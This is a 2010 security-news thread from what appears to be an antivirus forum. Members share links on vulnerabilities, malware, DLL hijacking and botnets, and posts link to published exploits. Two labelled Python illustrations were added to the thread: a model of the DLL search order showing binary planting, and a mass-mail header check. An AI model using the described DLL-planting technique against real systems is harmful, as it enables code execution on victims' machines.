Critical hole in Adobe Reader
http://www.h-online.com/security/news/item/Critical-hole-in-Adobe-Reader-and-nobody-wants-to-know-1050622.html
asyn
Adobe expects to make these updates available during the week of August 16, 2010.
http://www.adobe.com/support/security/bulletins/apsb10-17.html
asyn
-
Don't feel bad David. I had to do them on 2 PC's with dial-up. Talk about having a very long night and day!
I don't feel bad about it, if anything dial-up teaches you all about patience.
Or as the Vulture said, "Patience my ass I'm gonna kill something."
-
I don't feel bad about it, if anything dial-up teaches you all about patience.
Or as the Vulture said, "Patience my ass I'm gonna kill something."
Patience...I pay my bills, I can write an story, clean, and yes...think about killing the machines on dial-up! I'm glad we see eye to eye on this. ;D
-
Shiny Old VxWorks Vulnerabilities
VxWorks flaws allow access to numerous network devices
http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html
asyn
-
Critical....!! Or not..??
Decide for yourself... ;)
http://www.vupen.com/english/advisories/2010/2029
http://secunia.com/advisories/40870/
asyn
-
@ Asyn: got to find the link again, there are 14 patches coming up next week (from MS)
okay here: http://www.microsoft.com/technet/security/bulletin/ms10-aug.mspx
"expand" Executive Summaries, and see if what you posted is inside. I'll check too ;)
-
@ Asyn: got to find the link again, there are 14 patches coming up next week (from MS)
"expand" Executive Summaries, and see if what you posted is inside. I'll check too ;)
Usually they aren't that fast in fixing... ;)
Did you find it there..? I didn't.
asyn
-
@ Asyn: got to find the link again, there are 14 patches coming up next week (from MS)
"expand" Executive Summaries, and see if what you posted is inside. I'll check too ;)
Usually they aren't that fast in fixing... ;)
Did you find it there..? I didn't.
asyn
nope ;D ...didn't see that you were referring to a just discovered flaw okay ;)
-
Thunder from the cloud...!!!
http://www.darkreading.com/smb-security/security/perimeter/showArticle.jhtml?articleID=226500300
asyn
-
Apache CouchDB 1.0.0 suffers potential data loss bug
http://couchdb.apache.org/notice/1.0.1.html
asyn
-
Private-Browsing-Modes - Not that private at all
An analysis of private browsing modes in modern browsers (Chrome/Firefox/Internet Explorer/Safari)
http://crypto.stanford.edu/~dabo/pubs/abstracts/privatebrowsing.html
Full Paper here: (Nice read, don't miss it...)
http://crypto.stanford.edu/~dabo/pubs/papers/privatebrowsing.pdf
asyn
-
Private-Browsing-Modes - Not that private at all
More:
http://www.bbc.co.uk/news/technology-10891355
http://hphosts.blogspot.com/2010/06/internet-explorer-8-is-inprivate.html
-
Vulnerability in OpenSSL 1.0.x
http://www.h-online.com/security/news/item/Vulnerability-in-OpenSSL-1-0-x-1053147.html
asyn
-
First SMS trojan for Android detected
http://www.kaspersky.com/au/news?id=207576152
asyn
-
Microsoft Security Advisory (2264072)
Elevation of Privilege Using Windows Service Isolation Bypass
https://www.microsoft.com/technet/security/advisory/2264072.mspx
asyn
-
Microsoft Security Advisory (2264072)
Elevation of Privilege Using Windows Service Isolation Bypass
https://www.microsoft.com/technet/security/advisory/2264072.mspx
asyn
Read the Frequently Asked Questions:
Is this a security vulnerability that requires Microsoft to issue a security update?
No. The Windows Service Isolation feature is an optional configuration that some customers may choose to deploy. This feature is not appropriate for all customers. Windows Service Isolation is a defense-in-depth feature and not a proper security boundary and should not be construed as such.
-
Indonesia blocks access to 4 million porn sites
Good move.
http://ibnlive.in.com/news/indonesia-blocks-access-to-4-million-porn-sites/128637-2.html
-
Online Virus Robs 3,000 UK Bank Accounts
http://news.sky.com/skynews/Home/Technology/Computer-Virus-Zeus-V3-Hits-Large-UK-Financial-Institution-And-Bank-Customers-Says-M28-Security-Labs/Article/201008215681025?lpos=Technology_First_Home_Article_Teaser_Region_8&lid=ARTICLE_15681025_Computer_Virus_Zeus_V3_Hits_Large_UK_Financial_Institution_And_Bank_Customers_Says_M28_Security_Labs
-
Don't you just love short URLs ;D
-
Don't you just love short URLs ;D
+1 ;D
-
Botnet attacks SSH servers
http://isc.sans.edu/diary.html?storyid=9370
http://www.malwarecity.com/community/index.php?showtopic=1177
asyn
-
Hi Logos and bob3160,
Here is Pondus link again, now it is fun to click: http://tiny.cc/sd387
polonus
P.S. Check the link because tiny links can also be used for abuse..
-
Botnet attacks SSH servers
http://isc.sans.edu/diary.html?storyid=9370
http://www.malwarecity.com/community/index.php?showtopic=1177
asyn
VirusTotal - linux_sshscan.ex$ - 1/42
http://www.virustotal.com/file-scan/report.html?id=95dda5f750510e0d7d49512b425548d4cb400ddb129d331bdcfaae6f2424566c-1281641251
-
Hi Pondus,
That is frightening, my good friend. I have VTZilla now in the Flock browser. HackTool programs are used to create new users in the list of permitted system visitors, and to delete information from system logs in order to hide the malicious user's presence on the system. These programs are also used to analyze and collect network packets to carry out specific malicious actions.
Malicious users employ HackTool programs when setting up attacks on local or remote computers. This ELF malware is a command line tool that utilizes the SSH (Secure Shell) exploit vulnerability in Linux. When executed successfully, it enables a remote user to have full access to the affected system's functions. It can be used to download and execute possibly-malicious files, upload the user's files, access user accounts and perform administrative commands.
Hope detection of it follows and all files can be scanned successfully,
Damian
-
Hi Logos and bob3160,
Here is Pondus link again, now it is fun to click: http://tiny.cc/sd387
polonus
P.S. Check the link because tiny links can also be used for abuse..
One of the reasons I avoid them like the plague. ;D
-
Hi Logos and bob3160,
Here is Pondus link again, now it is fun to click: http://tiny.cc/sd387
polonus
P.S. Check the link because tiny links can also be used for abuse..
Hi Polonus,
Here (http://news.sky.com/skynews/Home/Technology/Computer-Virus-Zeus-V3-Hits-Large-UK-Financial-Institution-And-Bank-Customers-Says-M28-Security-Labs/Article/201008215681025?lpos=Technology_First_Home_Article_Teaser_Region_8&lid=ARTICLE_15681025_Computer_Virus_Zeus_V3_Hits_Large_UK_Financial_Institution_And_Bank_Customers_Says_M28_Security_Labs) is Pondus link again, now it is fun to click, and hovering over it, you can see where it goes.
[url=Internet address]Link text[/url]
Online security firm M86 Security Labs said the customers were infected with a Trojan virus - which cannot be detected by traditional anti-virus software - while browsing the internet.
The Trojan, known as a Zeus v3, copies the passwords and usernames of customers' online details and transfers their funds to a different account.
It then gives the victim of the virus a false bank balance screen so they are unaware the cash has been taken.
M86 said the virus is potent because it has been carried on legitimate websites located in the UK and not confined to porn and gambling hubs.
Any of the old guard still going to tell us "keep away from dodgy sites and you'll be fine"?
-
First SMS-sending Android Trojan
http://news.cnet.com/8301-27080_3-20013222-245.html
-
A plethora of malware for mobile phones to be expected soon?
http://norman.com/security_center/security_center_archive/2010/91464/en
Security flaw creates Android, Palm Pre snoop risk
http://www.theregister.co.uk/2010/08/13/smartphone_security_bug/
Free Android antivirus clocks up 2.5m downloads
http://www.theregister.co.uk/2010/08/11/free_android_security_app/
-
Code 9 for kids on the Internet reappears for social networks
http://press.pandasecurity.com/news/code-9-for-kids-on-the-internet-reappears-for-social-networks/
Cracking the code of teens' IM slang
http://news.cnet.com/Cracking-the-code-of-teens-IM-slang/2009-1025_3-6135457.html
-
Server-based botnet floods net with brutish SSH attacks
http://www.theregister.co.uk/2010/08/12/server_based_botnet/
also see reply #636 / #638
-
Details of vulnerabilities in the Palm Pre and Android published
http://www.pcpro.co.uk/news/interviews/360256/q-a-how-we-sliced-open-palm-and-android-security
asyn
-
First SMS-sending Android Trojan
http://news.cnet.com/8301-27080_3-20013222-245.html
Also see Reply #629... ;)
asyn
-
Call to improve password security
http://www.bbc.co.uk/news/technology-10963967
quote:
The growing use of graphics cards as surrogate supercomputers could spell trouble for users of short passwords
-
Stuxnet worm could hijack power plants, refineries
http://news.cnet.com/8301-27080_3-20013545-245.html
-
Well.....not security news but found this very important ... :o ....statistic concerning smart phones
if you have one you may want to switch brand .....or get one if not ;D
Sexual Activity by Smart Phone Brand ....... ;D ;D ;D
http://blog.okcupid.com/index.php/dont-be-ugly-by-accident/
hmmmm........ i wonder if there is a statistic by antivirus brand.....may have to switch if ....... ;D
-
Well.....not security news but found this very important ... :o ....statistic concerning smart phones
if you have one you may want to switch brand .....or get one if not ;D
I don't have a smart phone. ;D
-
Well.....not security news but found this very important ... :o ....statistic concerning smart phones
if you have one you may want to switch brand .....or get one if not ;D
I don't have a smart phone. ;D
in what end of the statistic does that place you......high or low...... ;D
-
don't use Canary (current version, must be 6.0.493) if you got LastPass
updating v8 from 5214 to 5242 causes LastPass SHA256 hashing code to fail
http://code.google.com/p/chromium/issues/detail?id=52096
http://forums.lastpass.com/viewtopic.php?f=14&t=41109&p=151719&sid=aaeed2c35d2af7abb644cee325a6392f
I have no idea if that bug implies a security flaw as well.
-
Trivial forwarding attack on NTLMv2 authentication
http://extendedsubset.com/?p=36
http://www.zdnet.com/blog/security/security-flaws-haunt-ntlmv1-2-challenge-response-protocol/7136
http://www.theregister.co.uk/2010/08/12/ntlm_authentication_still_vulnerable/
asyn
-
Ruby update closes XSS vulnerability
http://www.ruby-lang.org/en/news/2010/08/16/ruby-1-9-1-p430-is-released/
asyn
-
RIM offers Indian government surveillance tools
http://online.wsj.com/article/SB10001424052748703960004575427312899373090.html?mod=WSJEUROPE_hpp_sections_tech
asyn
-
ColdFusion vulnerability more critical than first thought
http://h30507.www3.hp.com/t5/Following-the-White-Rabbit-A/Adobe-ColdFusion-s-Directory-Traversal-Disaster/ba-p/81964
http://www.exploit-db.com/exploits/14641/
http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
asyn
-
Android game secretly transmits GPS coordinates
http://www.symantec.com/connect/blogs/androidostapsnake-watching-your-every-move
asyn
-
The Facebook dislike button scam
http://www.h-online.com/security/news/item/The-Facebook-dislike-button-scam-1060712.html
asyn
-
Government Uses Social Networking Sites for More than Investigations
http://www.eff.org/deeplinks/2010/08/government-monitors-much-more-social-networks
asyn
-
Government Uses Social Networking Sites for More than Investigations
http://www.eff.org/deeplinks/2010/08/government-monitors-much-more-social-networks
asyn
yeah so what...there's nothing surprising, when people agree to disclose aspects of their private life on the net, without restricting access anyway, it is also expected that the cops etc...might get interested ;D
-
Skeletons Hidden in the Linux Closet: r00ting your Linux
http://theinvisiblethings.blogspot.com/2010/08/skeletons-hidden-in-linux-closet.html
asyn
-
Skeletons Hidden in the Linux Closet: r00ting your Linux
http://theinvisiblethings.blogspot.com/2010/08/skeletons-hidden-in-linux-closet.html
asyn
The kernel-level "patch" has been implemented last week by Linus Torvalds, and pushed upstream into recent stable kernels. (http://youfail.org)
-
Due to fake digital signatures (stolen), other antivirus/suites are removing this option from their products.
For instance Comodo (for registered users: https://forums.comodo.com/beta-corner-cis/no-option-for-not-trusting-digitally-signed-applications-t60658.0.html;msg425806#msg425806).
-
Hi malware fighters,
A hole just as big as the LNK hole, or even bigger, has been found for 40 Windows apps; together with
the Windows shell and various DLLs, these should be patched for this exploit vector, http://twitter.com/hdmoore/status/21510351207
The cat is out of the b*g, whether this is read as bug or bag!
For the time being one should block TCP ports 139 and 445 and disable the WebDAV client.
To close the ports use WWDC = Windows Worms Doors Cleaner 1.4 from here:
http://www.dobreprogramy.pl/Windows-Worms-Doors-Cleaner,Program,Windows,11744.html
Windows-Worms-Doors-Cleaner is a very good small program to do this,
polonus
-
Skeletons Hidden in the Linux Closet: r00ting your Linux
http://theinvisiblethings.blogspot.com/2010/08/skeletons-hidden-in-linux-closet.html
asyn
Update #1 - In an email, Joanna Rutkowska clarifies that Spengler's exploit targets "some unrelated vulnerability" and her reference to it was in relation to guesses made by Spengler noted in the source code comments.
Update #2 - As Marcus Meissner from the SUSE security team explained to heise Security, SUSE maintainer Andrea Arcangeli provided a fix for the problem in September 2004, but for unknown reasons this fix was not included in the Linux kernel. SUSE itself has the fix and SUSE Linux Enterprise 9, 10 and 11 as well as openSUSE 11.1 through 11.3 do not exhibit this vulnerability.
-
Hi malware fighters,
A hole just as big as the LNK hole, or even bigger, has been found for 40 Windows apps; together with
the Windows shell and various DLLs, these should be patched for this exploit vector, http://twitter.com/hdmoore/status/21510351207
Hi polonus,
more info here...
http://www.h-online.com/security/news/item/New-Windows-vulnerability-Applications-download-malicious-code-from-the-net-1062153.html
related info...
http://www.acrossecurity.com/aspr/ASPR-2010-08-18-1-PUB.txt
asyn
-
Hi Asyn,
The Metasploit exploit is ready-made and waiting on the desk, but has not been issued yet, because the exploit has not been revealed so far.
There are many more skeletons around in the MS cupboard. Mind you, what vulnerabilities will we see because of the memory adjustments that were applied as long ago as the NT 4.0 days,
polonus
-
Hi Asyn,
The Metasploit exploit is ready-made and waiting on the desk, but has not been issued yet, because the exploit has not been revealed so far.
I'll post any news on that when available, asap.
asyn
-
Hi malware fighters,
A hole just as big as the LNK hole, or even bigger, has been found for 40 Windows apps; together with
the Windows shell and various DLLs, these should be patched for this exploit vector, http://twitter.com/hdmoore/status/21510351207
The cat is out of the b*g, whether this is read as bug or bag!
For the time being one should block TCP ports 139 and 445 and disable the WebDAV client.
To close the ports use WWDC = Windows Worms Doors Cleaner 1.4 from here:
http://www.dobreprogramy.pl/Windows-Worms-Doors-Cleaner,Program,Windows,11744.html
Windows-Worms-Doors-Cleaner is a very good small program to do this,
polonus
Does not work on Windows 7!
-
Adobe releases emergency patches
http://www.theinquirer.net/inquirer/news/1728971/adobe-releases-emergency-patches
-
Hi forum friends,
The newly detected remote binary planting hole in Windows is much more severe than first thought, nearly all applications (220 were tested) are affected: http://news.idg.no/cw/art.cfm?id=8C1F74F0-1A64-67EA-E49A617FAC05584F
Moreover, the hole can be exploited quite easily. Most Windows applications use the exploitable functionality, so an MS patch will not be a very easy task; moreover, patching or changing how the functionality works could break quite a few applications. The exploit could have been around for 10 years, and was re-detected: http://www.securityfocus.com/bid/1699/discuss
At the time it was called: Microsoft Windows DLL Search Path Weakness.
http://msdn2.microsoft.com/en-us/library/ms972822.aspx.
The scope of the hole and abusing the exploit: https://deepsec.net/docs/speaker.html#PSLOT33
http://www.juniper.net/security/auto/vulnerabilities/vuln1699.html
A firewall blocking outbound WebDAV traffic (in addition to blocking all Windows Networking protocols) could stop an Internet-based attack.
How many of these holes are still around in the dark corners of Microsoft's code?
polonus
-
Scareware tries to trick marks into dropping defences
http://www.theregister.co.uk/2010/08/20/social_engineering_scareware/
and this is the bug
Rogue Turning Retrovirus
http://www.symantec.com/connect/blogs/rogue-turning-retrovirus
-
phpMyAdmin updates close vulnerabilities
http://www.phpmyadmin.net/home_page/security/PMASA-2010-4.php
http://www.phpmyadmin.net/home_page/security/PMASA-2010-5.php
http://www.phpmyadmin.net/home_page/downloads.php
asyn
-
Microsoft warns of DLL vulnerability in applications [More info]
http://www.microsoft.com/technet/security/advisory/2269637.mspx
http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html
http://blogs.technet.com/b/srd/archive/2010/08/23/more-information-about-dll-preloading-remote-attack-vector.aspx
http://packetstormsecurity.org/NT/audit/NSAGuidePlus.PDF
http://msdn.microsoft.com/en-us/library/ff919712(VS.85).aspx
Scope of DLL security problem widens
http://www.h-online.com/security/news/item/Scope-of-DLL-security-problem-widens-1066444.html
asyn
-
Apple releases Security Update for Mac OS X
http://support.apple.com/kb/HT4312
asyn
-
Apple releases Security Update for Mac OS X
http://support.apple.com/kb/HT4312
asyn
well that's cool ??? ;D
-
Logos,
On the site that came after millw0rm there are already exploits presented for Windows Live Email, uTorrent, Foxit Reader, Microsoft Power Point & Wireshark via DLL-hijacking. Standard Vista and Windows 7 programs are vulnerable: https://twitter.com/avivra/statuses/21994799124 Social engineering became just a bit easier: http://twitter.com/avivra/status/22000389011 Metasploit does all this automatically: https://twitter.com/hdmoore/status/22003840688
MS yesterday presented a tool to prevent loading of libraries from shared network folders: http://support.microsoft.com/kb/2264107 and a patch, here for Vista: http://www.microsoft.com/downloads/en/confirmation.aspx?familyId=86631d97-ebed-4346-be66-d6ba0f500cea&displayLang=en&pf=true
A good thing avast detects DLL-exploit,
polonus
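The DLL search-path weakness discussed in the posts above (an application asking for a DLL by bare name, Windows probing the current working directory, which follows the opened document onto a remote share) and the Microsoft KB 2264107 tool that removes the current working directory from that search, modelled as an added example. This is not Microsoft's code and not from anyone in the thread: the directory layout, the DLL name plugin_helper.dll, the share name and the viewer application are constructed for the illustration. The documented search order with SafeDllSearchMode enabled is application directory, system directory, 16-bit system directory, Windows directory, current working directory, then PATH; the 16-bit directory is left out. The CWDIllegalInDllSearch registry value mentioned in the comments is the setting that tool applies.

```python
"""Toy model of the Windows DLL search order, as an added illustration of the
binary-planting weakness discussed in the thread.  Not Microsoft's code and not
from the thread; paths, DLL names and the share name are constructed.

An unqualified LoadLibrary("name.dll") probes the application directory, the
system directory, the Windows directory, the current working directory (CWD)
and then the PATH directories.  The CWD follows the document the user opened,
so a document on a remote share puts an attacker-controlled directory into the
search path for every DLL that the earlier, trusted directories do not hold.
"""
from typing import Dict, Iterable, List, Optional, Tuple

# Constructed layout (assumption for the example, not a real system).
APP_DIR = r"C:\Program Files\ViewerApp"
SYSTEM_DIR = r"C:\Windows\System32"
WINDOWS_DIR = r"C:\Windows"
PATH_DIRS = [r"C:\Windows\System32", r"C:\Windows"]
REMOTE_SHARE = r"\\fileserver.example\public\docs"   # where the opened document lives

PRESENT_FILES = {
    APP_DIR + r"\viewer.exe",
    SYSTEM_DIR + r"\kernel32.dll",
    SYSTEM_DIR + r"\version.dll",
    REMOTE_SHARE + r"\report.doc",
    # A DLL the viewer asks for but never ships, planted next to the document.
    REMOTE_SHARE + r"\plugin_helper.dll",
}

TRUSTED_DIRS = (APP_DIR, SYSTEM_DIR, WINDOWS_DIR)


def search_order(cwd: str, cwd_in_search: bool = True) -> List[str]:
    """Directories probed for an unqualified DLL name, in order.

    cwd_in_search=False models the mitigations: SetDllDirectory("") called by
    the application, or CWDIllegalInDllSearch = 0xFFFFFFFF as set by the
    KB 2264107 tool, both of which drop the CWD from the default order.
    """
    order = list(TRUSTED_DIRS)
    if cwd_in_search:
        order.append(cwd)
    order.extend(PATH_DIRS)
    return order


def resolve_dll(name: str, order: Iterable[str],
                present: Iterable[str] = PRESENT_FILES) -> Optional[str]:
    """Path Windows would load for `name`, or None when no probed directory
    holds it (the load then fails instead of succeeding with a planted file).
    Windows paths are case-insensitive, so comparison is lower-cased."""
    files = {p.lower() for p in present}
    for directory in order:
        candidate = directory.rstrip("\\") + "\\" + name
        if candidate.lower() in files:
            return candidate
    return None


def is_remote(path: str) -> bool:
    """A path starting with two backslashes is a UNC (remote) path; WebDAV
    folders are reached through UNC paths as well."""
    return path.startswith("\\\\")


def audit_loads(names: Iterable[str], cwd: str,
                cwd_in_search: bool = True) -> Dict[str, Tuple[str, Optional[str]]]:
    """Classify each unqualified DLL load as trusted / cwd / cwd-remote / missing."""
    order = search_order(cwd, cwd_in_search)
    report: Dict[str, Tuple[str, Optional[str]]] = {}
    for name in names:
        path = resolve_dll(name, order)
        if path is None:
            verdict = "missing"
        elif path.lower().startswith(cwd.lower() + "\\") and cwd not in TRUSTED_DIRS:
            verdict = "cwd-remote" if is_remote(path) else "cwd"
        else:
            verdict = "trusted"
        report[name] = (verdict, path)
    return report


if __name__ == "__main__":
    loads = ["version.dll", "plugin_helper.dll"]
    print("default order:", audit_loads(loads, REMOTE_SHARE))
    print("CWD removed  :", audit_loads(loads, REMOTE_SHARE, cwd_in_search=False))
```

Two things the model makes visible: a DLL that really lives in System32 (version.dll here) is safe under SafeDllSearchMode because the system directory is probed before the CWD, so the attack only works for names the application asks for that no trusted directory holds; and removing the CWD from the search turns the planted load into a failed load, which is why applications that relied on the CWD can break after the fix, as the post above anticipates.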
-
@ Polonus: there was an article about that yesterday (dll hijacking), I got to find it again (I think that was an MS advisory), was mentioning that Firefox was vulnerable too. There's no possible fix with Windows, application developers are strongly advised (by MS) to change "something" in the way their app relates to Windows API, only way to get rid of the vulnerability.
But MS will provide the tools to be used for each OS by third party devs.
http://www.infosecurity-us.com/view/12030/dll-hijacking-bug-hits-microsoft-windows-/
http://www.microsoft.com/technet/security/advisory/2269637.mspx
edit: Avast is or was vulnerable too (I think I read in the forums here that the issue was fixed)
http://vupen.com/english/searchengine.php?keyword=insecure+library+loading
Avast! Antivirus File Opening Insecure Library Loading Vulnerability
http://www.vupen.com/english/advisories/2010/2175
Mozilla Firefox File Opening Insecure Library Loading Vulnerability
http://www.vupen.com/english/advisories/2010/2169
25.08.2010 : Avast! Antivirus File Opening Insecure Library Loading Vulnerability
25.08.2010 : TeamViewer File Opening Insecure Library Loading Vulnerability
25.08.2010 : Microsoft Windows Live Mail Insecure Library Loading Vulnerability
25.08.2010 : VLC Media Player File Opening Insecure Library Loading Vulnerability
25.08.2010 : Adobe Dreamweaver File Opening Insecure Library Loading Vulnerability
25.08.2010 : Adobe Photoshop File Opening Insecure Library Loading Vulnerability
25.08.2010 : Mozilla Firefox File Opening Insecure Library Loading Vulnerability
25.08.2010 : Microsoft Windows Address Book Insecure Library Loading Vulnerability
25.08.2010 : Opera Browser File Opening Insecure Library Loading Vulnerability
25.08.2010 : Microsoft Office PowerPoint Insecure Library Loading Vulnerability
25.08.2010 : Wireshark File Opening Insecure Library Loading Vulnerability
25.08.2010 : uTorrent File Opening Insecure Library Loading Vulnerability
-
the list is getting longer each hour it seems ;D
http://vupen.com/english/searchengine.php?keyword=insecure+library+loading
-
okay it's important to mention that Avast pre-release version is patched, I knew that a patch was mentioned by Vlk in his post about the pre-release:
http://forum.avast.com/index.php?topic=63151.msg533449#msg533449
... but I wasn't sure it was about the same vulnerability. Just got confirmation from Avast that it was actually just that.
-
first rootkit targeting 64 bit Windows
http://forum.avast.com/index.php?topic=63220.msg534244#msg534244
-
I was on a IE tab on firefox and a page just showed up that said:
STOCKPHOTO
you just have been hacked By tun hacker
hacked by Number 7. Tn.Spamer
contact; an.7@live.fr greetz: tun hackers~~underground people
I really need help because I don't know what to do. I unplugged the ethernet cable to the desktop. I hope this laptop is not affected.
HELP!!!!HELP!!!!!PLEASE,PLEASE,PLEASE!!!!!!!!!!!
-
I was on a IE tab on firefox and a page just showed up that said:
STOCKPHOTO
you just have been hacked By tun hacker
hacked by Number 7. Tn.Spamer
contact; an.7@live.fr greetz: tun hackers~~underground people
I really need help because I don't know what to do. I unplugged the ethernet cable to the desktop. I hope this laptop is not affected.
HELP!!!!HELP!!!!!PLEASE,PLEASE,PLEASE!!!!!!!!!!!
this is not a help thread. Why did you post here ???
-
Hi malware fighters,
Autorun DLL Hijacker usb stick: http://www.attackvector.org/autorun-dll-hijacker-usb-stick/
One day attackers will also use malicious pop-ups, just wait and see,
polonus
-
Outbreak: Fake Fedex Tracking Number emails carry malware
http://origin-www.sophos.com/blogs/gc/g/2010/08/26/outbreak-fake-fedex-tracking-number-emails-carry-malware/
-
Outbreak: Fake Fedex Tracking Number emails carry malware
http://origin-www.sophos.com/blogs/gc/g/2010/08/26/outbreak-fake-fedex-tracking-number-emails-carry-malware/
Not new at all.
I have had these in various guises for ages now...
(one thing I still don't get is that the email says it is to someone with a completely different email address and yet it still comes to me... ???)
http://forum.avast.com/index.php?topic=59388.msg500590#msg500590
-
@ spg SCOTT
See Bcc:Blind carbon copy
In the context of correspondence, blind carbon copy (abbreviated Bcc:) refers to the practice of sending a message to multiple recipients in such a way that conceals individual email addresses (mentioned in "to" field of the mail) from the complete list of recipients.
http://en.wikipedia.org/wiki/Blind_carbon_copy
-
<snip>
Not new at all.
I have had these in various guises for ages now...
(one thing I still don't get is that the email says it is to someone with a completely different email address and yet it still comes to me... ???)
<snip>
That should be the biggest clue of all that it is a fake, as a legitimate copy would be addressed directly to the customer for whom the invoice, tracking number, consignment, etc. is intended.
But the spammers aren't going to send out spam to individual addresses but to groups of addresses.
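The Bcc: explanation above and DavidR's point about the missing direct address boil down to one check a mail filter can make: is the mailbox that received the message actually named in its To: or Cc: headers? Bcc: is stripped in transit, so a Bcc'd blast arrives naming someone else or a group such as "undisclosed-recipients:;". The following is an added example (not code from the thread or from any product mentioned in it) using Python's standard email module; the sample messages and all addresses in it are constructed for illustration.

```python
"""Flag mail that was not visibly addressed to the mailbox that received it.

Added example for this thread, not from the forum or any vendor. Spam blasts
go to a list of addresses, often via Bcc:, so the To:/Cc: headers of the copy
you receive name someone else or a group like "undisclosed-recipients:;".
A genuine courier or invoice notification is addressed directly to the customer.
"""
from email import message_from_string
from email.utils import getaddresses

# Constructed sample messages (hypothetical addresses, not real mail).
LEGIT_NOTICE = """\
From: Parcel Service <tracking@courier.example>
To: Me <me@example.com>
Subject: Shipment 1234 (constructed sample)

Your parcel is on its way.
"""

BCC_BLAST = """\
From: Customer Service <noreply@courier-tracking.example>
To: someone.else@example.net
Subject: Your tracking number (constructed sample)

Open the attachment to see your tracking number.
"""

UNDISCLOSED_BLAST = """\
From: Customer Service <noreply@courier-tracking.example>
To: undisclosed-recipients:;
Subject: Your tracking number (constructed sample)

Open the attachment to see your tracking number.
"""


def visible_recipients(raw_message):
    """Lower-cased addresses found in To: and Cc:.

    Bcc: is removed by the sending server before delivery, so a Bcc'd copy
    shows only the other recipients. The group syntax "name:;" carries no
    address at all and is treated as nobody being named.
    """
    msg = message_from_string(raw_message)
    pairs = getaddresses(msg.get_all("To", []) + msg.get_all("Cc", []))
    return {addr.lower() for _name, addr in pairs if addr}


def addressed_to_me(raw_message, my_address):
    """True when my mailbox is named in To:/Cc: of the message I received."""
    return my_address.lower() in visible_recipients(raw_message)


def review(raw_message, my_address):
    """Short verdict explaining why a message looks like a mass mailing."""
    names = visible_recipients(raw_message)
    if not names:
        return "suspicious: no individual recipient named (group or Bcc-only send)"
    if my_address.lower() not in names:
        return "suspicious: addressed to {} but delivered to {}".format(
            ", ".join(sorted(names)), my_address)
    return "ok: addressed directly to {}".format(my_address)


if __name__ == "__main__":
    for sample in (LEGIT_NOTICE, BCC_BLAST, UNDISCLOSED_BLAST):
        print(review(sample, "me@example.com"))
```

The check is deliberately narrow: mailing lists and legitimate Bcc'd newsletters trip it too, so it is one scoring signal among others (sender domain, attachment type), not a verdict on its own.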
-
Attackers exploit DLL vulnerability in Office and other applications
http://isc.sans.edu/diary.html?storyid=9445
asyn
-
Hi malware fighters,
How tracking cookies are being preserved inside IE, while the user wants to delete them at shutdown of the browser:
http://ha.ckers.org/blog/20100827/ie-cookies/
IE does not handle cookies always with the browser user in mind,
polonus
-
IE does not handle cookies always with the browser user in mind,
polonus
Yes D., true..!
That's just one of the reasons why I never would use it...
Btw., Ccleaner does a good job here. ;)
asyn
-
IE does not handle cookies always with the browser user in mind,
polonus
Yes D., true..!
That's just one of the reasons why I never would use it...
Btw., Ccleaner does a good job here. ;)
asyn
Also for Firefox. ;)
-
Once-prolific Pushdo botnet crippled
http://www.theregister.co.uk/2010/08/27/pushdo_botnet_crippled/
M86 security labs
http://labs.m86security.com/2010/08/pushdo-spambot-crippled/
Brian Krebs - Takedowns: The Shuns and Stuns That Take the Fight to the Enemy
http://www.mcafee.com/us/local_content/misc/threat_center/articles/summer2010/msj_article02_take_the_fight_to_the_enemy.pdf
-
Hi mkis,
Yes, Pushdo was infiltrated, but it seems that the C&C servers are being specifically protected by Chinese and American hosting firms, so the perpetrators will keep a low profile for a while and then continue their activities: http://blog.fireeye.com/research/2010/08/infiltrating-pushdo-part-2.html
So this time they were saved by their own back-up C&C servers. Hard to understand why the various governments (USA, Europe, Russia, China) did not close down the hosting firms of the aforementioned back-up C&C servers, or do they have a serious interest in not taking action?
polonus
-
Hard to understand why the various governments (USA, Europe, Russia, China) did not close down the hosting firms of the aforementioned back-up C&C servers, or do they have a serious interest in not taking action?
polonus
Big Gov's intelligence sectors love dipping fingers into the black market. They maybe (I say MAYBE ;)) have a vested interest/money in keeping them going.
But it might just be good old bureaucratic "red tape" also. Don't know about abroad, but in the states you could tell the Fed. Govt. their pants are on fire, they would have to fill out 20 different requisition forms to request first a fire extinguisher, then more forms for what type, weight, etc. All the while with pants still burning.
-
Hi malware fighters,
Just in: a new DLL-hijacking exploit, this time for Fx: http://www.exploit-db.com/exploits/14730/
They keep them coming,
Detect vulnerable Windows apps within 25 to 30 minutes with this free tool: https://www.metasploit.com/redmine/projects/framework/repository/raw/external/source/DLLHijackAuditKit.zip
polonus
-
Detect vulnerable Windows apps within 25 to 30 minutes with this free tool: https://www.metasploit.com/redmine/projects/framework/repository/raw/external/source/DLLHijackAuditKit.zip
polonus
What I see: Internet Explorer cannot display the webpage
I guess Fx is being exploited now.
-
It isn't a web page, but a zip file to be downloaded, so I rather doubt you could display it in any browser.
Most browsers would recognise it isn't a web page and download the file (depending on your settings) or pop-up a download window.
Mine recognised it as a zip file and downloaded it as per my settings.
So Firefox isn't being exploited, rather IE can't seem to deal with a download link.
-
Detect vulnerable Windows apps within 25 to 30 minutes with this free tool: https://www.metasploit.com/redmine/projects/framework/repository/raw/external/source/DLLHijackAuditKit.zip
polonus
What I see: Internet Explorer cannot display the webpage
I guess Fx is being exploited now.
The link actually crashed IE 8 so I guess it's IE8 that has a problem.
Copying the link opened Gigaget (download manager) which had no problems downloading the .zip file
Chrome also had no problems handling the link posted. :)
-
Detect vulnerable Windows apps within 25 to 30 minutes with this free tool: https://www.metasploit.com/redmine/projects/framework/repository/raw/external/source/DLLHijackAuditKit.zip
polonus
What I see: Internet Explorer cannot display the webpage
I guess Fx is being exploited now.
The link actually crashed IE 8 so I guess it's IE8 that has a problem.
Copying the link opened Gigaget (download manager) which had no problems downloading the .zip file
Chrome also had no problems handling the link posted. :)
???
-
Microsoft tool for DLL vulnerability interferes with some applications
http://www.h-online.com/open/news/item/Microsoft-tool-for-DLL-vulnerability-interferes-with-some-applications-1069540.html
asyn
-
Apple QuickTime backdoor creates code-execution peril / Getting punked by 9-year-old parameter
http://www.theregister.co.uk/2010/08/30/apple_quicktime_critical_vuln/
-
Apple QuickTime backdoor creates code-execution peril / Getting punked by 9-year-old parameter
http://www.theregister.co.uk/2010/08/30/apple_quicktime_critical_vuln/
Detailed Info here:
http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1
asyn
-
